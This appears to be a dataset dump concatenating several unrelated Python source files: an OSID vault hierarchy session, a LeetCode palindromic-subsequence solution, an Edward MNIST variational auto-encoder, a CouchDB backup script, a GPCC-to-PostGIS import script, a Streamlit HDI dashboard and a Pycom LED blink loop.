*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_ancestor_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_ancestor_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_ancestor(id_=id_, ancestor_id=vault_id)
@utilities.arguments_not_none
def has_child_vaults(self, vault_id):
"""Tests if a vault has any children.
arg: vault_id (osid.id.Id): a ``vault_id``
return: (boolean) - ``true`` if the ``vault_id`` has children,
``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_child_bins
if self._catalog_session is not None:
return self._catalog_session.has_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_children(id_=vault_id)
@utilities.arguments_not_none
def is_child_of_vault(self, id_, vault_id):
"""Tests if a vault is a direct child of another.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a child of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_child_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_child_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_child(id_=vault_id, child_id=id_)
@utilities.arguments_not_none
def get_child_vault_ids(self, vault_id):
"""Gets the child ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.id.IdList) - the children of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_child_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_children(id_=vault_id)
@utilities.arguments_not_none
def get_child_vaults(self, vault_id):
"""Gets the children of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.authorization.VaultList) - the children of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bins
if self._catalog_session is not None:
return self._catalog_session.get_child_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_child_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_descendant_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a descendant of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a descendant of
the ``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` is not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_descendant_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_descendant_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_descendant(id_=id_, descendant_id=vault_id)
@utilities.arguments_not_none
def get_vault_node_ids(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.hierarchy.Node) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_node_ids
if self._catalog_session is not None:
return self._catalog_session.get_catalog_node_ids(
catalog_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
return self._hierarchy_session.get_nodes(
id_=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
@utilities.arguments_not_none
def get_vault_nodes(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.authorization.VaultNode) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_nodes
return objects.VaultNode(self.get_vault_node_ids(
vault_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)._my_map, runtime=self._runtime, proxy=self._proxy)
class VaultHierarchyDesignSession(abc_authorization_sessions.VaultHierarchyDesignSession, osid_sessions.OsidSession):
"""This session defines methods for managing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``.
"""
_session_namespace = 'authorization.VaultHierarchyDesignSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_design_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_design_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_modify_vault_hierarchy(self):
"""Tests if this user can change the hierarchy.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known performing any update
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer these
operations to an unauthorized user.
return: (boolean) - ``false`` if changing this hierarchy is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.can_modify_bin_hierarchy_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_modify_catalog_hierarchy()
return True
@utilities.arguments_not_none
def add_root_vault(self, vault_id):
"""Adds a root vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: AlreadyExists - ``vault_id`` is already in hierarchy
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.add_root(id_=vault_id)
@utilities.arguments_not_none
def remove_root_vault(self, vault_id):
"""Removes a root vault from this hierarchy.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
        raise: NotFound - ``vault_id`` is not a root of this hierarchy
        raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_root_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_root_catalog(catalog_id=vault_id)
return self._hierarchy_session.remove_root(id_=vault_id)
@utilities.arguments_not_none
def add_child_vault(self, vault_id, child_id):
"""Adds a child to a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the new child
raise: AlreadyExists - ``vault_id`` is already a parent of
``child_id``
raise: NotFound - ``vault_id`` or ``child_id`` not found
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.add_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vault(self, vault_id, child_id):
"""Removes a child from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the child
raise: NotFound - ``vault_id`` not parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.remove_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vaults(self, vault_id):
"""Removes all children from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` is not in hierarchy
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.remove_children(id_=vault_id)
| 45.960684 | 186 | 0.654709 | 159,782 | 0.990454 | 0 | 0 | 102,051 | 0.632592 | 0 | 0 | 105,793 | 0.655788 |
cdfc9bf4504d5cc25bda0a98802b00001e0b1b9c | 1,031 | py | Python | LeetCode/516-longest-palindromic-subsequence.py | leaving-voider/LeetCode.cn-Record | 2922cbdab85556bc0625adc9e6ce44849232e4f4 | [
"MIT"
]
| null | null | null | LeetCode/516-longest-palindromic-subsequence.py | leaving-voider/LeetCode.cn-Record | 2922cbdab85556bc0625adc9e6ce44849232e4f4 | [
"MIT"
]
| null | null | null | LeetCode/516-longest-palindromic-subsequence.py | leaving-voider/LeetCode.cn-Record | 2922cbdab85556bc0625adc9e6ce44849232e4f4 | [
"MIT"
]
| null | null | null | ###############################################################################################
# A fairly standard interval-DP problem. Unlike [5. Longest Palindromic Substring],
# a "substring"/"subarray" must be contiguous, whereas a "subsequence" need not be.
# The dp definition therefore differs: for a subsequence, dp can store a length,
# while for a contiguous substring, dp stores a boolean (is-palindrome or not).
###########
# Time complexity:  O(n^2)
# Space complexity: O(n^2)
###############################################################################################
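# Worked example (added for illustration): for s = "bbbab" the answer is 4
# ("bbbb"); intervals are filled by increasing length, e.g. dp[0][4] =
# dp[1][3] + 2 because s[0] == s[4] == 'b' and dp[1][3] = 2 ("bb" in "bba").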
class Solution:
def longestPalindromeSubseq(self, s: str) -> int:
N, len_ = len(s)+1, len(s)
        dp = [[0]*N for _ in range(N)] # dp[i][j]: length of the longest palindromic subsequence in s[i..j]
for i in range(len_):
dp[i][i] = 1
if i < len_-1:
dp[i][i+1] = 2 if s[i] == s[i+1] else 1
for le in range(3, len_+1):
for i in range(len_-le+1):
l, r = i, i+le-1
if s[l] == s[r]:
dp[l][r] = dp[l+1][r-1] + 2
else:
                    dp[l][r] = max(dp[l][r-1], dp[l+1][r], dp[l+1][r-1]) # dp[l+1][r-1] is redundant here: it is the smallest of the three and already covered by dp[l][r-1] and dp[l+1][r]
return dp[0][len_-1] | 44.826087 | 131 | 0.354995 | 758 | 0.585328 | 0 | 0 | 0 | 0 | 0 | 0 | 679 | 0.524324 |
cdfcd2a90ed7ec6257eb01c41e93f4909519bbec | 3,427 | py | Python | examples/vae.py | zhangyewu/edward | 8ec452eb0a3801df8bda984796034a9e945faec7 | [
"Apache-2.0"
]
| 5,200 | 2016-05-03T04:59:01.000Z | 2022-03-31T03:32:26.000Z | examples/vae.py | zhangyewu/edward | 8ec452eb0a3801df8bda984796034a9e945faec7 | [
"Apache-2.0"
]
| 724 | 2016-05-04T09:04:37.000Z | 2022-02-28T02:41:12.000Z | examples/vae.py | zhangyewu/edward | 8ec452eb0a3801df8bda984796034a9e945faec7 | [
"Apache-2.0"
]
| 1,004 | 2016-05-03T22:45:14.000Z | 2022-03-25T00:08:08.000Z | """Variational auto-encoder for MNIST data.
References
----------
http://edwardlib.org/tutorials/decoder
http://edwardlib.org/tutorials/inference-networks
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import os
import tensorflow as tf
from edward.models import Bernoulli, Normal
from edward.util import Progbar
from observations import mnist
from scipy.misc import imsave
tf.flags.DEFINE_string("data_dir", default="/tmp/data", help="")
tf.flags.DEFINE_string("out_dir", default="/tmp/out", help="")
tf.flags.DEFINE_integer("M", default=100, help="Batch size during training.")
tf.flags.DEFINE_integer("d", default=2, help="Latent dimension.")
tf.flags.DEFINE_integer("n_epoch", default=100, help="")
FLAGS = tf.flags.FLAGS
if not os.path.exists(FLAGS.out_dir):
os.makedirs(FLAGS.out_dir)
def generator(array, batch_size):
"""Generate batch with respect to array's first axis."""
start = 0 # pointer to where we are in iteration
while True:
stop = start + batch_size
diff = stop - array.shape[0]
if diff <= 0:
batch = array[start:stop]
start += batch_size
else:
batch = np.concatenate((array[start:], array[:diff]))
start = diff
batch = batch.astype(np.float32) / 255.0 # normalize pixel intensities
batch = np.random.binomial(1, batch) # binarize images
yield batch
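# Minimal usage sketch of the generator above (mirrors what main() does):
#
#   x_train_generator = generator(x_train, FLAGS.M)
#   x_batch = next(x_train_generator)  # binarized 0/1 batch of shape (M, 28*28), cycles forever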
def main(_):
ed.set_seed(42)
# DATA. MNIST batches are fed at training time.
(x_train, _), (x_test, _) = mnist(FLAGS.data_dir)
x_train_generator = generator(x_train, FLAGS.M)
# MODEL
# Define a subgraph of the full model, corresponding to a minibatch of
# size M.
z = Normal(loc=tf.zeros([FLAGS.M, FLAGS.d]),
scale=tf.ones([FLAGS.M, FLAGS.d]))
hidden = tf.layers.dense(z, 256, activation=tf.nn.relu)
x = Bernoulli(logits=tf.layers.dense(hidden, 28 * 28))
# INFERENCE
# Define a subgraph of the variational model, corresponding to a
# minibatch of size M.
x_ph = tf.placeholder(tf.int32, [FLAGS.M, 28 * 28])
hidden = tf.layers.dense(tf.cast(x_ph, tf.float32), 256,
activation=tf.nn.relu)
qz = Normal(loc=tf.layers.dense(hidden, FLAGS.d),
scale=tf.layers.dense(
hidden, FLAGS.d, activation=tf.nn.softplus))
# Bind p(x, z) and q(z | x) to the same TensorFlow placeholder for x.
inference = ed.KLqp({z: qz}, data={x: x_ph})
optimizer = tf.train.RMSPropOptimizer(0.01, epsilon=1.0)
inference.initialize(optimizer=optimizer)
tf.global_variables_initializer().run()
n_iter_per_epoch = x_train.shape[0] // FLAGS.M
for epoch in range(1, FLAGS.n_epoch + 1):
print("Epoch: {0}".format(epoch))
avg_loss = 0.0
pbar = Progbar(n_iter_per_epoch)
for t in range(1, n_iter_per_epoch + 1):
pbar.update(t)
x_batch = next(x_train_generator)
info_dict = inference.update(feed_dict={x_ph: x_batch})
avg_loss += info_dict['loss']
# Print a lower bound to the average marginal likelihood for an
# image.
avg_loss /= n_iter_per_epoch
avg_loss /= FLAGS.M
print("-log p(x) <= {:0.3f}".format(avg_loss))
# Prior predictive check.
images = x.eval()
for m in range(FLAGS.M):
imsave(os.path.join(FLAGS.out_dir, '%d.png') % m,
images[m].reshape(28, 28))
if __name__ == "__main__":
tf.app.run()
| 31.731481 | 77 | 0.676685 | 0 | 0 | 538 | 0.156989 | 0 | 0 | 0 | 0 | 861 | 0.25124 |
cdff5880102eb2ba8d22b6cbec2e9bb5407da963 | 2,196 | py | Python | backup.py | BigBlueHat/copy-couch | ab4759540faecae8239c94e8045f7fce1f4a4914 | [
"Apache-2.0"
]
| null | null | null | backup.py | BigBlueHat/copy-couch | ab4759540faecae8239c94e8045f7fce1f4a4914 | [
"Apache-2.0"
]
| null | null | null | backup.py | BigBlueHat/copy-couch | ab4759540faecae8239c94e8045f7fce1f4a4914 | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python
"""copy-couch makes copies of couches. no joke.
License: Apache 2.0 - http://opensource.org/licenses/Apache-2.0
"""
import argparse
import base64
import ConfigParser
import datetime
import json
import requests
argparser = argparse.ArgumentParser()
argparser.add_argument('config_file', type=file,
help="Config INI file. See `config.sample.ini` for info.")
args = argparser.parse_args()
config = ConfigParser.RawConfigParser({
    'protocol': 'http',
'host': 'localhost:5984'
})
config.readfp(args.config_file)
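# Hypothetical shape of the INI file implied by the reads below; only the
# section and key names are taken from this script, the values are made up
# (passwords are stored base64-encoded):
#
#   [local]
#   protocol = http
#   host = localhost:5984
#   user = admin
#   password = cGFzc3dvcmQ=
#
#   [remote]
#   protocol = https
#   host = backup.example.org
#   user = admin
#   password = cGFzc3dvcmQ=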
local_couch = config._sections['local']
local_couch['password'] = base64.b64decode(local_couch['password'])
local_url = local_couch['protocol'] + '://' + local_couch['host'] + '/'
remote_couch = config._sections['remote']
remote_couch['password'] = base64.b64decode(remote_couch['password'])
remote_url = remote_couch['protocol'] + '://' + remote_couch['host'] + '/'
# setup local db session
local_db = requests.Session()
local_db.auth = (local_couch['user'], local_couch['password'])
# setup remote db session
remote_db = requests.Session()
remote_db.auth = (remote_couch['user'], remote_couch['password'])
rv = local_db.get(local_url).json()
uuid = rv['uuid']
rv = local_db.get(local_url + '_all_dbs').json()
# TODO: make the set of databases to copy configurable
dbs = [db for db in rv if db[0] != '_']
# create & store one rep_doc per database
for db in dbs:
    # build one replication document per local DB, targeting the remote backup DB
rep_doc = {
"_id": "backup~" + datetime.datetime.now().isoformat(),
"source": local_url,
"target": remote_couch['protocol'] + '://' \
+ remote_couch['user'] + ':' + remote_couch['password'] \
+ '@' + remote_couch['host'] + '/backup%2F' + uuid + '%2F',
"create_target": True
}
    rep_doc['source'] += db
    rep_doc['target'] += db
# TODO: make the backup db name configurable / reusable
print 'Copying ' + db
print ' from: ' + local_url
print ' to: ' + remote_url + 'backup%2F' + uuid + '%2F' + db
rv = local_db.post(local_url + '_replicate', json=rep_doc, headers = {
'Content-Type': 'application/json'})
print rv.json()
| 29.675676 | 74 | 0.659836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 839 | 0.382058 |
a8042d0c00c4fb676c0f0e3967070e3d72d5ef12 | 3,568 | py | Python | import_scripts/gpcc2gcmon.py | Jozelito/Raster2TXT | 337c87298ffc6227ca952e9e5cd17a54979e2224 | [
"MIT"
]
| null | null | null | import_scripts/gpcc2gcmon.py | Jozelito/Raster2TXT | 337c87298ffc6227ca952e9e5cd17a54979e2224 | [
"MIT"
]
| null | null | null | import_scripts/gpcc2gcmon.py | Jozelito/Raster2TXT | 337c87298ffc6227ca952e9e5cd17a54979e2224 | [
"MIT"
]
| 1 | 2018-05-29T21:16:44.000Z | 2018-05-29T21:16:44.000Z | #Script para la importacion de datos netCDF de un mes del GPCC en PostGIS.
#Autor: José I. Álvarez Francoso
import sys
from osgeo import gdal, ogr, osr
from osgeo.gdalconst import GA_ReadOnly, GA_Update
# Helper that rewinds the cursor so the "percent complete" message is overwritten in place
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
# Main function
def gpcc2gcm_win(pg_connection_string, mes, agno):
  # Register the GDAL drivers
gdal.AllRegister()
  # PostGIS driver, needed to create the table
driver = ogr.GetDriverByName('PostgreSQL')
  # Assume the SRS is EPSG:4326
srs = osr.SpatialReference()
srs.ImportFromEPSG(4326)
  # Read the last band of the dataset (the latest month)
fuente = "C:/Cualquier_directorio" + mes + "_" + agno + "/first_guess_monthly_" + agno + "_" + mes + ".nc"
dataset = gdal.Open( fuente, GA_ReadOnly )
subdatasets = dataset.GetSubDatasets()
subdataset_p = subdatasets[0][0]
sds = gdal.Open(subdataset_p, gdal.GA_ReadOnly)
cols = sds.RasterXSize
rows = sds.RasterYSize
  # Create the PostGIS table "gpcc_p_<mes><agno>" for our data in the "public" schema
table_name = 'gpcc_p_' + mes + agno
pg_ds = ogr.Open(pg_connection_string, GA_Update )
pg_layer = pg_ds.CreateLayer(table_name, srs = srs, geom_type=ogr.wkbPoint,
options = [
             'GEOMETRY_NAME=geom',  # name of the geometry column
             'OVERWRITE=YES',  # drop and recreate the table if it exists
             'SCHEMA=public',  # target schema
])
  print 'Created table %s.' % table_name
  # Create the "mes", "agno" and "p_mes" fields in the table
fd_mes = ogr.FieldDefn('mes', ogr.OFTInteger)
pg_layer.CreateField(fd_mes)
  print 'Created field mes.'
fd_agno = ogr.FieldDefn('agno', ogr.OFTInteger)
pg_layer.CreateField(fd_agno)
  print 'Created field agno.'
fd_temp = ogr.FieldDefn('p_mes', ogr.OFTReal)
pg_layer.CreateField(fd_temp)
  print 'Created field p_mes.'
# get georeference transformation information
pixelWidth = 1
pixelHeight = 1
xOrigin = -179.5
yOrigin = 89.5
# Iteramos filas y columnas y definimos x e y
data = []
band = sds.GetRasterBand(1)
band_data = band.ReadAsArray(0, 0, cols, rows)
data.append(band_data)
id_n = 0
for r in range(rows):
y = yOrigin - (r * pixelHeight)
for c in range(cols):
x = xOrigin + (c * pixelWidth)
      # For each cell, add a point to the PostGIS layer
point_wkt = 'POINT(%s %s)' % (x, y)
point = ogr.CreateGeometryFromWkt(point_wkt)
featureDefn = pg_layer.GetLayerDefn()
feature = ogr.Feature(featureDefn)
      # Read the cell value and store it in the "p_mes" field
value = float(data[0][r,c])
      # Handle no-data cells (negative values)
if value < 0:
feature.UnsetField('p_mes')
else:
feature.SetField('p_mes', value)
feature.SetField('mes', mes)
feature.SetField('agno', agno)
id_n+=1
porcent = id_n * 100/ 64800
      sys.stdout.write('percent complete: ' + str(porcent))
sys.stdout.flush()
restart_line()
      # print 'Saving value %s for variable %s at point x: %s, y: %s' % (value, 'temp', x, y)
      # Set the feature geometry and finish creating the feature
feature.SetGeometry(point)
pg_layer.CreateFeature(feature)
if __name__ == '__main__':
  # The user must supply exactly three parameters: the GDAL PostGIS connection string, the month and the year
if len(sys.argv) < 4 or len(sys.argv) > 4:
print "uso: <GDAL PostGIS connection string> <mes> <agno>"
raise SystemExit
pg_connection_string = sys.argv[1]
mes = sys.argv[2]
agno = sys.argv[3]
gpcc2gcm_win(pg_connection_string, mes, agno)
raise SystemExit
| 36.783505 | 107 | 0.711323 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,431 | 0.40084 |
a804975ed4327041257e7e887706be1ffc7b7803 | 2,829 | py | Python | app.py | Raisler/Brazil_HDI_DataVisualization | 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | [
"MIT"
]
| null | null | null | app.py | Raisler/Brazil_HDI_DataVisualization | 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | [
"MIT"
]
| null | null | null | app.py | Raisler/Brazil_HDI_DataVisualization | 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | [
"MIT"
]
| null | null | null | import streamlit as st
import pandas as pd
import numpy as np
import plotly.express as px
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import matplotlib.pyplot as plt
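# To serve this dashboard locally (standard Streamlit workflow, assuming
# 'hdi.csv' sits next to this file): streamlit run app.py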
def load_data(data):
data=pd.read_csv(data)
return data
df = load_data('hdi.csv')
st.title('Human Development Index in Brazil')
select = st.sidebar.selectbox('Choose', ['Home', 'Analysis by Year', 'Analysis by State'])
if select == 'Home':
    st.write('This is a dashboard for exploring the HDI of all states in Brazil; you can see charts and values!')
    st.write('More improvements coming soon. #Version 1')
    st.write('In the sidebar, choose the option that gives you the best view!')
st.write('Author: Raisler Voigt | suggestions? [email protected]')
st.markdown('''<p align="center">
<a href="https://www.instagram.com/raislervoigt/" target="_blank" rel="noopener noreferrer">Instagram</a> •
<a href="https://twitter.com/VoigtRaisler" target="_blank" rel="noopener noreferrer">Twitter</a> •
<a href="https://www.linkedin.com/in/raisler-voigt7/" target="_blank" rel="noopener noreferrer">Linkedin</a> •
<a href="https://github.com/Raisler" target="_blank" rel="noopener noreferrer">GitHub</a>
</p>''', unsafe_allow_html=True)
if select == 'Analysis by Year':
    select1 = st.sidebar.selectbox('Analysis by Year', [2017, 2010, 2000, 1991])
fig1 = px.scatter(df, x="HDI Health {0}".format(select1), y="HDI Education {0}".format(select1), size="HDI {0}".format(select1), color="UF")
fig2 = px.histogram(df, x="UF", y = "HDI {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig3 = px.histogram(df, x="UF", y = "HDI Education {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig4 = px.histogram(df, x="UF", y = "HDI Health {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig5 = px.histogram(df, x="UF", y = "HDI Wealth {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig6 = df[['UF', "HDI Education {0}".format(select1), "HDI Health {0}".format(select1), "HDI Wealth {0}".format(select1)]]
st.write(fig1)
st.write(fig2)
st.subheader('HDI Education')
st.write(fig3)
st.subheader('HDI Health')
st.write(fig4)
st.subheader('HDI Wealth')
st.write(fig5)
st.write(fig6)
if select == 'Analysis by State':
select2 = st.sidebar.selectbox('Choose the State', df['UF'])
cdf = df
cdf.index = cdf['UF']
state = cdf.index == '{}'.format(select2)
state = cdf[state]
trans = state.transpose()
trans = trans.sort_index(ascending = False)
fig1 = px.histogram(x = trans.index, y = trans['{}'.format(select2)]).update_xaxes(categoryorder='total descending')
fig2 = state.transpose()
st.write(fig1)
st.write(fig2)
| 40.414286 | 144 | 0.679392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,208 | 0.425952 |
a804e02acc0b6d5ed28538bc5bf647eab91b6259 | 657 | py | Python | Examples/pycomBlink/main.py | sophie-bernier/RemoteOceanAcidificationMonitor | 6a8b799826a2eb9b1d5064883193c61eea0ee310 | [
"Unlicense"
]
| 1 | 2021-06-22T23:07:31.000Z | 2021-06-22T23:07:31.000Z | Examples/pycomBlink/main.py | sophie-bernier/RemoteOceanAcidificationMonitor | 6a8b799826a2eb9b1d5064883193c61eea0ee310 | [
"Unlicense"
]
| null | null | null | Examples/pycomBlink/main.py | sophie-bernier/RemoteOceanAcidificationMonitor | 6a8b799826a2eb9b1d5064883193c61eea0ee310 | [
"Unlicense"
]
| null | null | null | # main.py
import pycom
import time
pycom.heartbeat(False)
red = 0x08
blue = 0x00
green = 0x00
sleepTime = 0.01
def setRgb(red, green, blue):
rgbValue = 0x000000
rgbValue |= (red << 16) | (green << 8) | blue
pycom.rgbled(rgbValue)
return
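# Example (illustrative): setRgb(0x08, 0x00, 0x00) packs to 0x080000, a dim red.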
while True:
###
#if red >= 0x08:
# if green > 0:
# green -= 1
# else:
# blue += 1
#if blue >= 0x08:
# if red > 0:
# red -= 1
# else:
# green += 1
#if green >= 0x08:
# if blue > 0:
# blue -= 1
# else:
# red += 1
###
setRgb(red, green, blue)
time.sleep(sleepTime)
| 16.425 | 49 | 0.464231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 255 | 0.388128 |
a8054920242ac3e7b7e99120e329e53db3f718af | 1,891 | py | Python | dsn/pp/construct.py | expressionsofchange/nerf0 | 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | [
"MIT"
]
| 2 | 2019-04-30T05:42:05.000Z | 2019-08-11T19:17:20.000Z | dsn/pp/construct.py | expressionsofchange/nerf0 | 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | [
"MIT"
]
| null | null | null | dsn/pp/construct.py | expressionsofchange/nerf0 | 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | [
"MIT"
]
| null | null | null | from spacetime import get_s_address_for_t_address
from s_address import node_for_s_address
from dsn.s_expr.structure import TreeText
from dsn.pp.structure import PPNone, PPSingleLine, PPLispy, PPAnnotatedSExpr
from dsn.pp.clef import PPUnset, PPSetSingleLine, PPSetLispy
